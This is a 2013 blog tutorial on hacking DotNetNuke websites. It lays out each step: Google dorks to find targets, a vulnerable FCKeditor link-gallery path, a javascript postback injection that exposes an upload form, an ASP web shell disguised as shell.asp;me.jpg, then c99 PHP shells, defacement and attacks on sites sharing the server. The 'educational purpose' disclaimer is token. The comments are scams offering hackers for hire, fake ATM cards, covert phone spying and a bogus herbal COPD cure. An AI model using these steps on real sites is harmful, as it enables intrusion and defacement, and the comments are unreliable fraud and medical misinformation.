Friday 6 December 2013

Dot Net Nuke Hacking Tutorial


What is DNN (Dot Net Nuke) ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

In this tutorial, i am showing how to hack website with DNN Exploit

Step 1:

Go to Google

Step 2:


Now put any dork on search box and click Search.
  • inurl:fcklinkgallery.aspx 
  • inurl:/portals/0
  • inurl:/tabid/36/language/en-US/Default.aspx

Step 3:

It will show a list of many sites, select the site which you want to hack.

For example let's take this;

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

Step 4:


Now replace;



home/tabid/36/language/en-US/Default.aspx

With this;

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so your url will become;


http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx



Now there are 2 possibilities 


If you get Link Gallery URL select then site is not vulnerable, see the image below;;



and if get as shown in below image then the target is vulnerable;



Now if you have found a vulnerable site move to next step,

Step 5:


Now you can see 3 options there and we need to select “File”.




Step 6: Now after selecting option, we need to use a javascript code. For that we need to use that browser which supports javascript. Before using javascript first we need to choose file location as root, after that clear everything written on browser URL, paste the below javascript only.


javascript:__doPostBack('ctlURL$cmdUpload','')


After injecting the above javascript code in browser address bar,you will get upload option instead of selection option;




Step 7: Now you have to upload your shell, so first upload this shell shell.asp;me.jpg ( Download the shell from the Download button given at the end of article)


After uploading you can access your ASP shell by going to this address, 


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg


After opening this address you will get this and upload your any php shell i.e.JackelShell.php or c99.php




Step 8: After uploading your php shell navigate to;


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg


Now upload your Deface page in the root of the site. 
You can also hack all sites which are hosted on same server.

Note: Do Not Use Any Tutorial Of This Blog To Harm Anyone. This Is Only For Educational Purpose. I Will Not Be Responsible For Anything Done By You.






Do you my like Articles..?

Get Free Email Updates Daily!

Follow us!

Categories:

10 comments:

  1. Replies
    1. Need The To Hire A Hacker❓ Then contact PYTHONAX✅

      The really amazing deal about contacting PYTHONAX is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.

      We have been Invisible to Authorities for almost a decade now and if you google PYTHONAX, not really about us comes out, you can only see comments made by us or about us.

      Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
      We perform every Hack there is, using special Hacking tools we get from the dark web.

      Some list of Hacking Services we provide are-:
      ▪️Phone Hacking & Cloning ✅
      ▪️Computer Hacking ✅
      ▪️Emails & Social Media Account Hacking✅
      ▪️Recovering Deleted Files✅
      ▪️Tracking & Finding People ✅
      ▪️Hunting Down Scammers✅
      ▪️Hack detecting ✅
      ▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
      ▪️Bitcoin Multiplication✅
      ▪️Binary Option Money Recovery ✅
      ▪️Forex Trading Money Recovery✅
      ▪️IQ Option Money Recovery✅
      And lots more......


      Whatever Hacking service you require, just give us an Email to the Emails Address provided below.
      pythonaxhacks@gmail.com
      pythonaxservices@gmail.com

      2020 © PYTHONAX.

      Delete
    2. I will start by saying to all that have COPD or Emphysema should please stop here and read up my story, So as you will know how to get your CURE. I had Chronic Obstructive Pulmonary Disease (COPD) for 15 years, My first symptoms were dry cough, chest tightness and shortness of breath. My first chest x-ray only showed bronchitis. Finally I went to a pulmonologist and was diagnosed with COPD, Am writing this article to appreciate the good work of General Herbal Center, that helped me get read of myCOPD/Emphysema that i have had for about 17years now, with no cure. After seeing a post of a Zom Sanchez from US on the Internet teying of how she was cured by Native Herbal Clinic prescribed remstifedies . I also decided to contact then for a cure and i purchased the medicine , because all i wanted was for me to get totally cure and to be free of it all my life. i Am happy today that they helped me and the remedies worked and i can proudly say that i am free from COPD and i am cured completely
      its not worst thing to have COPD/EMPHYSEMA as a begin,you can reach Native Herbal Clinic:(nativehealthclinic@gmail.com or whatsapp +2348140073956

      Delete
  2. You can GET THE NEWLY IMPROVED BLANK ATM CARD that can hack any ATM, ANYWHERE IN THE WORLD.{martinshackers22@gmail.com} I have been hearing about these BLANK ATM CARDS. I never knew it existed but until i tried my best to look for how i will get money to start up a business and pay my bills, i visited some sites so many times. I saw how people get helped with Blank ATM card from Hacking man called MARTINS. I was really surprise but i don’t really know what to do so i decided to email MARTINS. I complained to him how i needed money and he reply Yes, so I inquired about The Blank ATM Card. I have the faith is real and it will work because i saw many comments talking about his card. He told me Yes and that it is a card programmed for random money withdraws without being noticed and can also be used for free online purchases of any kind. i was amaze. after doing what he ask, 3 days later i received my card from DHL, i rush to try it on the closest ATM machine close to me, It worked like magic i was so happy. I was able to withdraw up to $9000 immediately. This was unbelievable and the happiest day of my life, So far i have being able to withdraw up to $88000 without any stress of being trace and caught. I don’t know why i am posting this here but i care about everyone who need financial help should contact him via {martinshackers22@gmail.com}

    ReplyDelete
  3. My wife was so smooth at hiding her infidelity and I had no proof for months, I saw a recommendation about a Private investigator  and decided to give him a try.. the result was incredible because all my cheating wife’s text messages, whatsapp, facebook and even phone calls conversations was linked directly to my cellphone. (worldcyberhackers @ gmail . com) Mr James helped me put a round-the-clock monitoring on her and I got concrete evidence and gave it to my lawyer..if your wife is an expert at hiding her cheating adventures contact him through email or WhatsApp/SMS : +12678773020

    ReplyDelete
  4. I'm a professional in all kinds of hacking services, which leads me into giving out a blank ATM card to all individuals & serious minded people only. I hack, clone ATM cards worth's the total sum of $500,000.00 United States Dollars, with this card you can withdraw the sum of $3500 as daily limit till you cash out the sum total said sum & this cards has been cloned & hacked in the manner that you'll never be caught not detected during usage. For more info, kindly email us: fastatmhackers@gmail.com OR Call/WhatsApp: +16626183756




    ReplyDelete
  5. I will start by saying to all that have COPD or Emphysema should please stop here and read up my story, So as you will know how to get your CURE. I had Chronic Obstructive Pulmonary Disease (COPD) for 15 years, My first symptoms were dry cough, chest tightness and shortness of breath. My first chest x-ray only showed bronchitis. Finally I went to a pulmonologist and was diagnosed with COPD, Am writing this article to appreciate the good work of General Herbal Center, that helped me get read of myCOPD/Emphysema that i have had for about 17years now, with no cure. After seeing a post of a Zom Sanchez from US on the Internet teying of how she was cured by Native Herbal Clinic prescribed remstifedies . I also decided to contact then for a cure and i purchased the medicine , because all i wanted was for me to get totally cure and to be free of it all my life. i Am happy today that they helped me and the remedies worked and i can proudly say that i am free from COPD and i am cured completely
    its not worst thing to have COPD/EMPHYSEMA as a begin,you can reach Native Herbal Clinic:(nativehealthclinic@gmail.com or whatsapp +2348140073956

    ReplyDelete
  6. Hello everyone I want to introduce you guys to a group a private investigators who can help you with information you need in any situation in life and they are ready to follow you step by step until your case is cleared just contact +17078685071 and you will happily ever after
    Premiumhackservices@gmail.com

    ReplyDelete
  7. Cool way to have financial freedom!!! Are you tired of living a poor life, here is the opportunity you have been waiting for. Get the new ATM BLANK CARD that can hack any ATM MACHINE and withdraw money from any account. You do not require anybody’s account number before you can use it. Although you and I knows that its illegal,there is no risk using it. It has SPECIAL FEATURES, that makes the machine unable to detect this very card,and its transaction can’t be traced .You can use it anywhere in the world. With this card,you can withdraw nothing less than $4,500 a day. So to get the card,reach the hackers via email address : besthackersworld58@gmail.com or whatsapp him on +1(323)-723-2568

    ReplyDelete

Please Comment Here To Inform Us Your Review About It. Thank You